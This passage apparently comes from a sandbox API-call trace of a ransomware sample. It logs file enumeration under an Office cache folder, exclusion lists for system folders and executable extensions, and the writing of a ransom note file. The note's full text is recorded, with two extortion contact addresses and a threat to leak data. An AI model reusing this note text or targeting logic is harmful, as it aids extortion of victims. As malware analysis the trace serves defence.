0xef3280 [0143.388] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd218 [0143.388] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd2a0 [0143.388] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xef09d0 [0143.388] StrStrIW (lpFirst="Proof.es", lpSrch="tmp") returned 0x0 [0143.388] StrStrIW (lpFirst="Proof.es", lpSrch="winnt") returned 0x0 [0143.388] StrStrIW (lpFirst="Proof.es", lpSrch="temp") returned 0x0 [0143.388] StrStrIW (lpFirst="Proof.es", lpSrch="thumb") returned 0x0 [0143.388] StrStrIW (lpFirst="Proof.es", lpSrch="$Recycle.Bin") returned 0x0 [0143.388] StrStrIW (lpFirst="Proof.es", lpSrch="$RECYCLE.BIN") returned 0x0 [0143.388] StrStrIW (lpFirst="Proof.es", lpSrch="System Volume Information") returned 0x0 [0143.388] StrStrIW (lpFirst="Proof.es", lpSrch="Boot") returned 0x0 [0143.388] StrStrIW (lpFirst="Proof.es", lpSrch="Windows") returned 0x0 [0143.388] StrStrIW (lpFirst="Proof.es", lpSrch="Trend Micro") returned 0x0 [0143.388] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef32a8 [0143.388] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd218 [0143.388] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd2a0 [0143.388] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xef09d0 [0143.388] StrStrIW (lpFirst="Proof.fr", lpSrch="tmp") returned 0x0 [0143.388] StrStrIW (lpFirst="Proof.fr", lpSrch="winnt") returned 0x0 [0143.388] StrStrIW (lpFirst="Proof.fr", lpSrch="temp") returned 0x0 [0143.389] StrStrIW (lpFirst="Proof.fr", lpSrch="thumb") returned 0x0 [0143.389] StrStrIW (lpFirst="Proof.fr", lpSrch="$Recycle.Bin") returned 0x0 [0143.389] StrStrIW (lpFirst="Proof.fr", lpSrch="$RECYCLE.BIN") returned 0x0 [0143.389] StrStrIW (lpFirst="Proof.fr", lpSrch="System Volume Information") returned 0x0 [0143.389] StrStrIW (lpFirst="Proof.fr", lpSrch="Boot") returned 0x0 [0143.389] StrStrIW (lpFirst="Proof.fr", lpSrch="Windows") returned 0x0 [0143.389] StrStrIW (lpFirst="Proof.fr", lpSrch="Trend Micro") returned 0x0 [0143.389] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2808 [0143.389] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd218 [0143.389] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd2a0 [0143.389] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xef09d0 [0143.389] StrStrIW (lpFirst="Proofing.msi", lpSrch=".UAKXC") returned 0x0 [0143.389] StrStrIW (lpFirst="Proofing.msi", lpSrch=".exe") returned 0x0 [0143.389] StrStrIW (lpFirst="Proofing.msi", lpSrch=".dll") returned 0x0 [0143.389] StrStrIW (lpFirst="Proofing.msi", lpSrch=".lnk") returned 0x0 [0143.389] StrStrIW (lpFirst="Proofing.msi", lpSrch=".sys") returned 0x0 [0143.389] StrStrIW (lpFirst="Proofing.msi", lpSrch=".msi") returned=".msi" [0143.389] FindNextFileW (in: hFindFile=0xecfb20, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf00db300, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x32b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proofing.xml", cAlternateFileName="")) returned 1 [0143.389] lstrcmpW (lpString1="Proofing.xml", lpString2=".") returned 1 [0143.389] lstrcmpW (lpString1="Proofing.xml", lpString2="..") returned 1 [0143.389] StrStrIW (lpFirst="Proofing.xml", lpSrch=".UAKXC") returned 0x0 [0143.390] StrStrIW (lpFirst="Proofing.xml", lpSrch=".exe") returned 0x0 [0143.390] StrStrIW (lpFirst="Proofing.xml", lpSrch=".dll") returned 0x0 [0143.390] StrStrIW (lpFirst="Proofing.xml", lpSrch=".lnk") returned 0x0 [0143.390] StrStrIW (lpFirst="Proofing.xml", lpSrch=".sys") returned 0x0 [0143.390] StrStrIW (lpFirst="Proofing.xml", lpSrch=".msi") returned 0x0 [0143.390] StrStrIW (lpFirst="Proofing.xml", lpSrch="R3ADM3.txt") returned 0x0 [0143.390] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef32d0 [0143.390] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd218 [0143.390] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd2a0 [0143.390] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xef09d0 [0143.390] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0143.390] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0143.390] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0143.390] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0143.390] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0143.390] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0143.390] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0143.390] FindNextFileW (in: hFindFile=0xecfb20, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x42c75f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x42c75f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf58c6830, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x16fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0143.390] lstrcmpW (lpString1="Setup.xml", lpString2=".") returned 1 [0143.390] lstrcmpW (lpString1="Setup.xml", lpString2="..") returned 1 [0143.390] StrStrIW (lpFirst="Setup.xml", lpSrch=".UAKXC") returned 0x0 [0143.390] StrStrIW (lpFirst="Setup.xml", lpSrch=".exe") returned 0x0 [0143.390] StrStrIW (lpFirst="Setup.xml", lpSrch=".dll") returned 0x0 [0143.391] StrStrIW (lpFirst="Setup.xml", lpSrch=".lnk") returned 0x0 [0143.391] StrStrIW (lpFirst="Setup.xml", lpSrch=".sys") returned 0x0 [0143.391] StrStrIW (lpFirst="Setup.xml", lpSrch=".msi") returned 0x0 [0143.391] StrStrIW (lpFirst="Setup.xml", lpSrch="R3ADM3.txt") returned 0x0 [0143.391] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef32f8 [0143.391] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd218 [0143.391] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd2a0 [0143.391] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xef09d0 [0143.960] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5ab889f0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5ab889f0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfda0 [0143.961] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0143.961] FindNextFileW (in: hFindFile=0xecfda0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5ab889f0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5ab889f0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0143.961] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0143.961] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0143.961] FindNextFileW (in: hFindFile=0xecfda0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc138cb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd5600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Office32MUI.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0143.961] lstrcmpW (lpString1="Office32MUI.msi", lpString2=".") returned 1 [0143.961] lstrcmpW (lpString1="Office32MUI.msi", lpString2="..") returned 1 [0143.961] StrStrIW (lpFirst="Office32MUI.msi", lpSrch=".UAKXC") returned 0x0 [0143.961] StrStrIW (lpFirst="Office32MUI.msi", lpSrch=".exe") returned 0x0 [0143.961] StrStrIW (lpFirst="Office32MUI.msi", lpSrch=".dll") returned 0x0 [0143.961] StrStrIW (lpFirst="Office32MUI.msi", lpSrch=".lnk") returned 0x0 [0143.961] StrStrIW (lpFirst="Office32MUI.msi", lpSrch=".sys") returned 0x0 [0143.961] StrStrIW (lpFirst="Office32MUI.msi", lpSrch=".msi") returned=".msi" [0143.961] FindNextFileW (in: hFindFile=0xecfda0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc138cb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x567, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Office32MUI.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0143.961] lstrcmpW (lpString1="Office32MUI.xml", lpString2=".") returned 1 [0143.961] lstrcmpW (lpString1="Office32MUI.xml", lpString2="..") returned 1 [0143.961] StrStrIW (lpFirst="Office32MUI.xml", lpSrch=".UAKXC") returned 0x0 [0143.962] StrStrIW (lpFirst="Office32MUI.xml", lpSrch=".exe") returned 0x0 [0143.962] StrStrIW (lpFirst="Office32MUI.xml", lpSrch=".dll") returned 0x0 [0143.962] StrStrIW (lpFirst="Office32MUI.xml", lpSrch=".lnk") returned 0x0 [0143.962] StrStrIW (lpFirst="Office32MUI.xml", lpSrch=".sys") returned 0x0 [0143.962] StrStrIW (lpFirst="Office32MUI.xml", lpSrch=".msi") returned 0x0 [0143.962] StrStrIW (lpFirst="Office32MUI.xml", lpSrch="R3ADM3.txt") returned 0x0 [0143.962] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6c90 [0143.962] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd190 [0143.962] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd218 [0143.962] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xef09d0 [0143.962] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd218 | out: hHeap=0xea0000) returned 1 [0143.962] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd190 | out: hHeap=0xea0000) returned 1 [0143.962] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6c90 | out: hHeap=0xea0000) returned 1 [0143.962] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef56c8 [0143.962] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6c90 [0143.962] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef5ea8 [0143.963] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef56c8 | out: hHeap=0xea0000) returned 1 [0143.963] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef09d0 | out: hHeap=0xea0000) returned 1 [0143.963] FindNextFileW (in: hFindFile=0xecfda0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc301560, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2cb13b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OWOW32LR.cab", cAlternateFileName="")) returned 1 [0143.963] lstrcmpW (lpString1="OWOW32LR.cab", lpString2=".") returned 1 [0143.963] lstrcmpW (lpString1="OWOW32LR.cab", lpString2="..") returned 1 [0143.963] StrStrIW (lpFirst="OWOW32LR.cab", lpSrch=".UAKXC") returned 0x0 [0143.963] StrStrIW (lpFirst="OWOW32LR.cab", lpSrch=".exe") returned 0x0 [0143.963] StrStrIW (lpFirst="OWOW32LR.cab", lpSrch=".dll") returned 0x0 [0143.963] StrStrIW (lpFirst="OWOW32LR.cab", lpSrch=".lnk") returned 0x0 [0143.963] StrStrIW (lpFirst="OWOW32LR.cab", lpSrch=".sys") returned 0x0 [0143.963] StrStrIW (lpFirst="OWOW32LR.cab", lpSrch=".msi") returned 0x0 [0143.963] StrStrIW (lpFirst="OWOW32LR.cab", lpSrch="R3ADM3.txt") returned 0x0 [0143.963] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6c68 [0143.963] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd190 [0143.963] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd218 [0143.963] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xef09d0 [0143.963] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd218 | out: hHeap=0xea0000) returned 1 [0143.963] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd190 | out: hHeap=0xea0000) returned 1 [0143.963] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6c68 | out: hHeap=0xea0000) returned 1 [0143.963] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef56c8 [0143.963] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6c68 [0143.964] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef5f50 [0143.964] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef56c8 | out: hHeap=0xea0000) returned 1 [0143.964] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef09d0 | out: hHeap=0xea0000) returned 1 [0143.964] FindNextFileW (in: hFindFile=0xecfda0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5ab889f0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x5ab889f0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5ad2b910, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0143.964] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0143.964] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0143.964] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0143.964] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0143.964] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0143.964] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0143.964] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0143.964] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0143.964] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0143.964] FindNextFileW (in: hFindFile=0xecfda0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x93a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0143.964] lstrcmpW (lpString1="Setup.xml", lpString2=".") returned 1 [0143.964] lstrcmpW (lpString1="Setup.xml", lpString2="..") returned 1 [0143.964] StrStrIW (lpFirst="Setup.xml", lpSrch=".UAKXC") returned 0x0 [0143.964] StrStrIW (lpFirst="Setup.xml", lpSrch=".exe") returned 0x0 [0143.964] StrStrIW (lpFirst="Setup.xml", lpSrch=".dll") returned 0x0 [0143.964] StrStrIW (lpFirst="Setup.xml", lpSrch=".lnk") returned 0x0 [0143.964] StrStrIW (lpFirst="Setup.xml", lpSrch=".sys") returned 0x0 [0143.965] StrStrIW (lpFirst="Setup.xml", lpSrch=".msi") returned 0x0 [0143.965] StrStrIW (lpFirst="Setup.xml", lpSrch="R3ADM3.txt") returned 0x0 [0143.965] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6d80 [0143.965] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd190 [0143.965] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd218 [0143.965] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xef09d0 [0143.965] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd218 | out: hHeap=0xea0000) returned 1 [0143.965] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd190 | out: hHeap=0xea0000) returned 1 [0143.965] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6d80 | out: hHeap=0xea0000) returned 1 [0143.965] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef56c8 [0143.965] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6d80 [0143.965] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef5ff8 [0143.965] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef56c8 | out: hHeap=0xea0000) returned 1 [0143.965] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef09d0 | out: hHeap=0xea0000) returned 1 [0143.965] FindNextFileW (in: hFindFile=0xecfda0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x93a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0143.965] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd108 | out: hHeap=0xea0000) returned 1 [0143.965] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeead80 | out: hHeap=0xea0000) returned 1 [0143.966] FindClose (in: hFindFile=0xecfda0 | out: hFindFile=0xecfda0) returned 1 [0143.966] Sleep (dwMilliseconds=0x32) [0144.127] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0144.127] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeddcb8 | out: hHeap=0xea0000) returned 1 [0144.127] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xeddcb8 [0144.127] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd108 [0144.127] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0144.127] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd108 | out: hHeap=0xea0000) returned 1 [0144.127] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd108 [0144.127] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6df8 [0144.127] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd190 [0144.127] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd218 [0144.127] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xef09d0 [0144.131] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd218 | out: hHeap=0xea0000) returned 1 [0144.131] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd190 | out: hHeap=0xea0000) returned 1 [0144.131] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6df8 | out: hHeap=0xea0000) returned 1 [0144.131] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\R3ADM3.txt" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6dc [0146.983] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0146.983] WriteFile (in: hFile=0x6dc, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0146.984] CloseHandle (hObject=0x6dc) returned 1 [0146.984] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef09d0 | out: hHeap=0xea0000) returned 1 [0146.984] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd108 | out: hHeap=0xea0000) returned 1 [0146.984] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5c83f350, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5c83f350, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfb60 [0146.984] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0146.984] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5c83f350, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5c83f350, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.984] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0146.984] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0146.984] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf79111d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1200204, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="InfLR.cab", cAlternateFileName="")) returned 1 [0146.984] lstrcmpW (lpString1="InfLR.cab", lpString2=".") returned 1 [0146.984] lstrcmpW (lpString1="InfLR.cab", lpString2="..") returned 1 [0146.984] StrStrIW (lpFirst="InfLR.cab", lpSrch=".UAKXC") returned 0x0 [0146.985] StrStrIW (lpFirst="InfLR.cab", lpSrch=".exe") returned 0x0 [0146.985] StrStrIW (lpFirst="InfLR.cab", lpSrch=".dll") returned 0x0 [0146.985] StrStrIW (lpFirst="InfLR.cab", lpSrch=".lnk") returned 0x0 [0146.985] StrStrIW (lpFirst="InfLR.cab", lpSrch=".sys") returned 0x0 [0146.985] StrStrIW (lpFirst="InfLR.cab", lpSrch=".msi") returned 0x0 [0146.985] StrStrIW (lpFirst="InfLR.cab", lpSrch="R3ADM3.txt") returned 0x0 [0146.985] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2d58 [0146.985] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd108 [0146.985] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd190 [0146.985] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0146.985] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd190 | out: hHeap=0xea0000) returned 1 [0146.985] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd108 | out: hHeap=0xea0000) returned 1 [0146.985] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2d58 | out: hHeap=0xea0000) returned 1 [0146.985] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef56c8 [0146.985] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2d58 [0146.985] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef60a0 [0146.985] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef56c8 | out: hHeap=0xea0000) returned 1 [0146.985] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0146.985] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e58f90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, 